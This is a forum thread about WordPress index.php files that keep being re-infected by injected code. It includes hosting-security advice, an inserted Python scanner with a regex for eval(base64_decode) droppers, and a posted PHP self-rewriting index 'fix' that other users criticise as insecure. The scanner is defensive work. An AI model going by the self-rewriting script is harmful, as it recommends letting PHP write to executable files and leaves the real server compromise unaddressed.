my index.php infected, I cleaned it but the malware keeps coming.

Discussion in 'Security' started by profmustamar, Dec 15, 2011.

  1. #1
    Hello,
    I have a few websites in my webhosting. They are based on WordPress.

    For the last few days my websites have been infected by malware. Every main index.php in the domain root folder is infected with code like this:
    I scanned it through http://www.sucuri.net, and it says that my website is infected with MW JS Depack.
    I found this article: http://www.victorciobanu.com/how-to-remove-mwjsdepack/ but I think it's different, because I can't find any problem with my wp-settings.php.

    If you have any suggestion about this, let me know.
     
    profmustamar, Dec 15, 2011 IP
  2. madaboutlinux

    madaboutlinux Member

    #2
    It can happen due to a number of reasons.
    1. Incorrect permissions on your website files.
    2. Weak FTP passwords.
    3. A malicious script on your domain (under plugins/templates) injecting this code into your files.
    4. It could be on the server your website is hosted on, injecting code into not only your website but others too.
    etc..

    I think you are on a shared hosting server, and it is best for you to contact the hosting provider and ask them to check the server logs to find out how this happened. If they don't provide proper help, it's better to change the hosting company OR get your own server (VPS/dedicated) so you can have proper security settings and then host your websites.
     
    madaboutlinux, Dec 16, 2011 IP
  3. lachrymologist

    lachrymologist Active Member

    #3
    Change your FTP passwords; your PC might be infected by malware.
     
    lachrymologist, Dec 16, 2011 IP
  4. sandeep002

    sandeep002 Peon

    #4
    I agree with madaboutlinux. Add the toughest permissions to the root directory so that no user can update the files.
     
    sandeep002, Dec 19, 2011 IP
  5. ideamine

    ideamine Member

    #5
    Hi,

    Since the malware keeps coming and injecting lines of code into your files ... I recommend a full scan of the server and checking the permissions of the directories and files. While changing the permissions, ensure that it won't affect the sites' working.
     
    ideamine, Dec 20, 2011 IP
  6. evuln.com

    evuln.com Greenhorn

    #6
    + check recently modified files for web shells or reinstall WP from clean distro.
     
    evuln.com, Jan 1, 2012 IP
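An added example, not code from this thread: a small Python scanner that does what the first post and evuln.com's reply ask for on the defender's side. It finds the eval(base64_decode('...')) dropper shape the infected index.php files carried (and the gzinflate/str_rot13 variants of it), decodes the blob for inspection without ever executing it, strips the statement, and lists PHP files under a web root that were modified recently. The sample web root it builds is constructed for the demonstration.

```python
import base64
import os
import re
import tempfile
import time

INJECTION = re.compile(
    rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
    rb"\s*['\"]([A-Za-z0-9+/=\s]*)['\"]\s*\)\s*\)\s*;?", re.IGNORECASE)

def find_injections(data):
    """Return (offset, decoder, blob) for each eval(<decoder>('...')) in data."""
    return [(m.start(), m.group(1).lower().decode(), m.group(2))
            for m in INJECTION.finditer(data)]

def preview_payload(blob, limit=120):
    """Decode a base64 blob for inspection only; it is never executed."""
    try:
        return base64.b64decode(re.sub(rb"\s", b"", blob))[:limit].decode("latin-1")
    except ValueError:
        return ""

def strip_injections(data):
    """Remove the matched eval(...) statements; returns (cleaned, count)."""
    return INJECTION.subn(b"", data)

def scan_tree(root, max_age_days=7):
    """List PHP files that carry an injection or were modified in the last N days."""
    cutoff, findings = time.time() - max_age_days * 86400, []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hits = find_injections(fh.read())
            if hits or os.path.getmtime(path) >= cutoff:
                findings.append({"name": name, "path": path, "hits": hits})
    return findings

def make_sample_tree():
    """Constructed web root (not real malware): infected index.php, old clean plugin."""
    root = tempfile.mkdtemp()
    blob = base64.b64encode(b"error_reporting(0); echo 'constructed dropper';")
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php eval(base64_decode('" + blob + b"'));\nrequire 'wp-blog-header.php';\n")
    clean = os.path.join(root, "wp-content", "plugins", "hello.php")
    os.makedirs(os.path.dirname(clean))
    with open(clean, "wb") as fh:
        fh.write(b"<?php echo 'hello';\n")
    os.utime(clean, (time.time() - 30 * 86400,) * 2)  # a month old, so not flagged
    return root
```

Run scan_tree() against a copy of the web root and compare the hits with a clean WordPress checkout before deleting anything; an injection found in index.php only says where the dropper landed, not how it got there.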
  7. handell

    handell Peon

    #7
    I use this....


    <?php
    /*
    HEY ALL...
    This indexing method will remove all those malware attackers who try and add code to the index files. By changing the name of a good working non-infected index file to index_REAL.php or whatever. Then creating a new main index.php file that will contain only these 3 lines:
    <?php
    include("index_REAL.php") ;
    ?>

    So here's where the magic happens... the "index_REAL.php" file will rewrite the index file every time it gets accessed so any info that was changed will be restored with the original code by inserting this code at the end of "index_REAL.php"
    <?php
    $File = "index.php";
    $Handle = fopen($File, 'w');
    $Data = "<?php
    include(\"index_REAL.php\") ;
    ?>";
    fwrite($Handle, $Data);
    fclose($Handle);

    NOTE!!! BE CAREFUL NOT TO DELETE THE ORIGINAL "index_installer.php" is a self deleting installer file. If lost, a new copy can be downloaded from: http://tmgraphics.biz/standard/index_installer_BACKUP.php
    any questions, please email me at
    however you will have to enable the unlink installer line at the bottom of the script
    */
    $origindex = "index.php"; // assuming it's .php
    $realindex = "index_REAL.php";
    $myname = __FILE__;            // this installer script, deleted at the end
    echo basename($myname);

    if (!file_exists($realindex)) {
        echo "pass1";
        if (file_exists($origindex)) {
            echo "pass2";
            // keep the clean index under the new name
            rename($origindex, $realindex);
            // the new index.php only includes the real one
            // (no whitespace before <?php, or it gets sent to the browser)
            $Handle = fopen($origindex, 'w');
            $Data = "<?php
    include(\"$realindex\") ;
    ?>";
            fwrite($Handle, $Data);
            fclose($Handle);
            // append the rewrite stub so index_REAL.php restores index.php on every request;
            // close any open PHP block first, otherwise the appended <?php is a parse error
            $existing = rtrim(file_get_contents($realindex));
            $Handle = fopen($realindex, 'a');
            $Data = (substr($existing, -2) === '?>' ? "\n" : "\n?>\n") . "<?php
    \$File = \"$origindex\";
    \$Handle = fopen(\$File, 'w');
    \$Data = \"<?php
    include(\\\"$realindex\\\") ;
    ?>\";
    fwrite(\$Handle, \$Data);
    fclose(\$Handle);
    ?>";
            fwrite($Handle, $Data);
            fclose($Handle);
            echo "pass3 <a href=\"$origindex\">GOTO INDEX</a>";
        }
    } else {
        echo "you are already SAFE!!!, '$realindex' ALREADY EXISTS!!";
    }
    sleep(2);
    unlink($myname);   // the installer deletes itself
    ?>
     
    handell, Nov 6, 2015 IP
  8. PoPSiCLe

    PoPSiCLe Illustrious Member

    #8
    No, no, no, no, no, no, no, no and HELL NO.
    This code is utter garbage, and provides no more "security" than actually fixing the problem on the server.
    Not to mention that the code itself is horribly written.
    Just fix the problems on the server, and forget about "magic mushroom cloud fixes" like this one.
    I'm just gonna go hit my head on my desk now.
     
    PoPSiCLe, Nov 8, 2015 IP
  9. deathshadow

    deathshadow Acclaimed Member

    #9
    Gotta go with @PoPSiCLe on this one; because allowing PHP write access to executable files couldn't possibly open up even bigger security holes than already exist...

    Of course that it's a spammish bump of a four year old thread doesn't help with the credibility a whole lot either.
     
    deathshadow, Nov 8, 2015 IP
  10. abdmjz

    abdmjz Active Member

    #10
    Just remove the malware code from index.php and use the chattr command to protect the file from being modified. Even the owner won't be able to make changes without disabling it.

    To lock
    chattr +i /home/username/domains/yourdomain.com/public_html/path/to/file

    To unlock
    chattr -i /home/username/domains/yourdomain.com/public_html/path/to/file
     
    abdmjz, Nov 8, 2015 IP
  11. handell

    handell Peon

    #11
    Say what you will; after repeated malware attacks, thank god I have not had an issue with spammers altering my index file since.
    It's only garbage if it doesn't work.
     
    handell, Nov 9, 2015 IP
  12. PoPSiCLe

    PoPSiCLe Illustrious Member

    #12
    Eh, no. It's garbage when it's garbage. That code is horrible, mostly with what it does and how it's written. Add to that that there is no real security in it at all, and the fact that there is NO WAY the normal index.php file should be any more vulnerable than index_blah_something_not_the_real_index.php - a php-file is read ON THE SERVER - nothing in it should be accessible from the outside, apart from the html output to the browser. I don't get how "my index-file is full of malware" doesn't begin to light up some bulbs that MAYBE there's something wrong ON THE SERVER - either the config of the host, or some security flaws in the code running on it, or just plain old stupidity (which I will guess is a pretty strong contender here).

    BTW - there are [ code ] -bbcodes on this forum. No need to paste code directly in a post, and no, it doesn't help that you color it blue.

    Besides - for that junk code - this does the exact same thing, in about 1/3 of the lines of code:
    
    <?php
    if (!file_exists('index_REAL.php')) {
       if (file_exists('index.php')) {
         rename('index.php','index_REAL.php');
         $data = "<?php
             include('index_REAL.php');
         ?>";
         file_put_contents('index.php',$data);
         // escape the inner $data so it is written literally instead of interpolated
         $data = "<?php
               \$data = '<?php
                           include(\'index_REAL.php\');
                       ?>';
               file_put_contents('index.php',\$data);
               ?>";
         // close any open PHP block before appending, or the appended <?php is a parse error
         if (substr(rtrim(file_get_contents('index_REAL.php')), -2) !== '?>') {
           file_put_contents('index_REAL.php',"\n?>\n",FILE_APPEND);
         }
         file_put_contents('index_REAL.php',$data,FILE_APPEND);
       }
    } else {
       echo 'You\'re already "safe" - index_REAL.php already exists';
    }

       echo '<a href="index.php">GOTO INDEX</a>';

    ?>
    
    PHP:
     
    PoPSiCLe, Nov 9, 2015 IP
  13. Server rental bangalore

    Server rental bangalore Banned

    #13
    try to encode using different algorithms